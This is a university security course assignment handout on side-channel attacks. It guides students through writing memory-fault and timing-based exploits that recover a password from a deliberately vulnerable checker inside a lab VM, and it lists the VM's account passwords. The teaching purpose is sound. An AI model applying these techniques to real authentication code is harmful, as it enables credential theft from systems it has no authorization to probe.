PA2: Side Channel Attacks Spring 2022
Due: Thursday, April 28 at 11:59pm
This is a group project; you can work in a team of size at most two and submit one project per team. You are not required to work with the same partner on every project. You and your partner should collaborate closely on each part.
You have two late days that you may use to turn in work past the deadline over the entire quarter. A late day is a contiguous 24-hour period. Both you and your partner will be charged for every late day that you use, and you both must have late days to use them. These late days are intended to cover your extension needs for usual circumstances: brief illness, busy with other classes, interviews, travel, extracurricular conflicts, and so on. You do not need to ask permission to use a late day.
The code and other answers you submit must be entirely your team's own work. You may discuss the conceptualization of the project and the meaning of the questions, but you may not look at any part of someone else’s solution or collaborate with anyone other than your partner. You may consult published references, provided that you appropriately cite them (e.g., with program comments).
Solutions must be submitted to Gradescope.
Introduction
The goal of this assignment is to gain hands-on experience exploiting side channels. This assignment will demonstrate how side channels can be just as dangerous as the control flow vulnerabilities you exploited in PA 1.
You will be provided a two skeleton files (memhack.c
and
timehack.c
) that you will use to exploit side channels present in a
target library (sysapp.c
) to obtain a protected key. You may consult
any online references you wish. You must document sources you used in
your solutions, for example with program comments. Failure to do so
will be considered a violation of the academic integrity policy.
Read this First
This project asks you to develop attacks and test them in a virtual machine you control. Attempting the same kinds of attacks against others’ systems without authorization is prohibited by law and university policies and may result in fines, expulsion, and jail time. You must not attack anyone else’s system without authorization! You are required to respect the privacy and property rights of others at all times, or else you will fail the course.
Alice's company Security4All has noticed possible user passwords breach. Alice wants to figure out if the breach really happened. Unfortunately for Alice and her company, the breach can be very bad news and can affect the company's reputation badly. Alice would be super happy to get your assistance in developing exploits to verify if passwords can indeed be breached using side channel attacks.
Getting Started
Just like PA1, for this assignment you will be provided with a VirtualBox VM containing all the files you need. You can download the VM image here. As in PA1, download CSE127-PA2-VBOX.zip if VirtualBox is compatible with your machine; download CSE127-PA2-UTM.zip if you are using an M1 Mac (Intel Macs can use either VM software).
Make sure to import the pa2box.vbox
file into VirtualBox via the
Machine
→ Add
menu item; don't create a brand-new VirtualBox
VM or import the
pa2box-data.vmdk
file on its own: If you do this, you won't have the correct
configuration.
The VM is configured with two users: student
, with password
hacktheplanet
;
and root
, with password hackallthethings
. We recommend you use the
VM via
ssh
and scp
, just like previous assignments. Please note that SSH
is
disabled for root
, so you can only SSH in as the student
user.
SSH is listening on port 2222
, i.e.
ssh -p 2222 student@localhost
You can still log in as root
using su
or by logging into the VM
directly, i.e.
student@CSE127:~$ su root
You can redownload the starter code here.
Assignment Files
Starter files are included inside the student
user's home directory within the
VM image.
There are two parts to this assignment, each with its own subdirectory,
memhack
and timehack
. Each subdirectory contains exploit starter
code
(memhack.c
or timehack.c
), which imports a library
(sysapp.c
, with the
same contents across the two subdirectories) with password-checking
functionality vulnerable to side-channel attacks. You should not
modify
sysapp.c
, only memhack.c
and timehack.c
. Each
subdirectory contains a
Makefile
for building your exploits, i.e. run make
or
make clean
if desired.
Assignment Instructions
You will be writing two exploits, each of which takes advantage of a side
channel, to obtain the password in sysapp.c
. In memhack.c
, you
will exploit
a memory-based side channel, and in timehack.c
you will exploit a
timing-based side channel. See Section 2 for specific details. Once both of
your exploits can determine the password stored in correct_pass
in
sysapp.c
and call the
hack_system()
function successfully, the assignment is complete.
Submitting Your Solutions
Submit memhack.c
, timehack.c
to the PA2: Side Channel Attacks assignment on Gradescope.
The score that you receive on Gradescope is NOT your final grade for the PA, so please make sure that you test your code thoroughly.
Grading
We will randomize the contents of the correct_pass
variable, and we expect your
memhack.c
and timehack.c
to correctly determine the password.
Each attack is worth 8 points.
To summarize, the points will be allocated as follows:
- 10 points for the memory-based side channel exploit
- 10 points for the timing-based side channel exploit
Exploit Construction
Memory-Based Side Channel
We recommend you start with the memory-based side channel because it is
deterministic and doesn't have problems with noise. Look at the check_pass()
function in sysapp.c
and note two things:
- The password string is passed by reference
- The memory it points to is checked against the reference password one character at a time.
Now look in memhack.c
and note how a buffer is allocated such that the page
starting at page_start
is protected (i.e., accessing it will caused a
segmentation fault, or SEGV) and the previous 32 characters are allocated.
Now look at the demonstration function demonstrate_signals()
, which shows how
referencing any memory in the protected page will produce a fault. Also observe
how the function catches that fault. You do not need to use this function;
it is merely there to show you how to use signals to capture whether a memory
reference touched a page or not.
Now you will want to create a framework (in memhack.c
) to call
check_pass()
with different inputs and catching any resulting faults so you can determine if
part of the password is correct. We suggest a loop over the maximum password
size (32 characters) where for the first guess you store the password such that
its first character is one byte before page start and then iterate between
possible choices for the first character (when you get it right you will get a
page fault). Repeat this to guess the entire password. Note that all ASCII
symbols from ASCII symbol 33 (!
) to ASCII symbol 126 (∼
) can be
used in the password.
Other hints:
- You are already given a page protected buffer with enough memory to crack the password. All you need to do is use it appropriately for each guess you make.
- The
demonstrate_signals
function handles all the segfaults for you. You can re-use almost all of it in your code.
Note on sigsetjmp
/siglongjmp
We highly advise reading the man pages for
sigsetjmp
/siglongjmp
so you
understand how they work.
One frequent pitfall students run into is calling sigsetjmp
inside of a helper
function, which can cause undefined behavior (especially when running on Gradescope).
An excerpt from man sigsetjmp
:
If the function which called setjmp() returns before longjmp() is called, the behavior is undefined. Some kind of subtle or unsubtle chaos is sure to result.
Timing-Based Side Channel
Unlike the memory-based side channel, the timing-based side channel will deal
with noise. Go back and look at check_pass()
. An artificial delay has been
added when each character is checked to make your life easier (it’s possible to
do the assignment without it but it would require a much more careful
methodology). The execution time of check_pass()
depends on how many
characters you guess correctly.
Look in timehack.c
and find a macro there for a function called
rdtsc()
which invokes the processors cycle counter (a clock that increments by one for
each processor cycle that passes). In general, treat rdtsc()
as a free
running timer that returns a long
. Insert a call to rdtsc()
before
the call
to check_pass()
and afterwards. Print the difference between these values to
see how long (in cycles) the password checking ran. Run the program a few
times. Now change the guess string so the first character is correct. Run again
and see how the time difference changes.
Now automate this entire process, in the style of the original approach in
memhack.c
. Note that unlike the memhack
attack, the
timehack
problem will
have to deal with noise. Depending on things like what
other programs are
running, the status of the cache, the contents of the branch target buffer,
etc... there can be significant variability in the amount of time each check
takes. This will matter in practice. You will want to run
a lot of trials
before you reach your conclusion about each character. Other hints:
- Be careful in using
printf
’s. These can blow out the instruction cache and data caches and perturb your results (i.e. overwhelm the timing effects you are trying to detect). - Be careful in averaging across trials. If your process is descheduled in the middle of a measurement, the time cost of that individual trial will be so large that it overwhelms everything else. Instead, the median is your friend. However, feel free to experiment if something does not work for you.
- If time is not continuing to increase as you progress through characters, then you probably made a bad guess earlier. Backtrack.
rdtsc()
will wrap around at some point. You may need to handle this outlier if it is causing issues.- Debugging advice: make a big array to hold your timing measurements and print them at the end.
- Be sure to test a bunch of different passwords. We will when we grade.
Final Notes
Do not write a solution that simply checks all passwords exhaustively. You will not get credit for this. The timing side channel should be exploitable in linear time (we will stop programs that are running for excessive periods) and it will basically feel instantaneous for passwords of 8 characters or less (note we will not test passwords over 12 characters).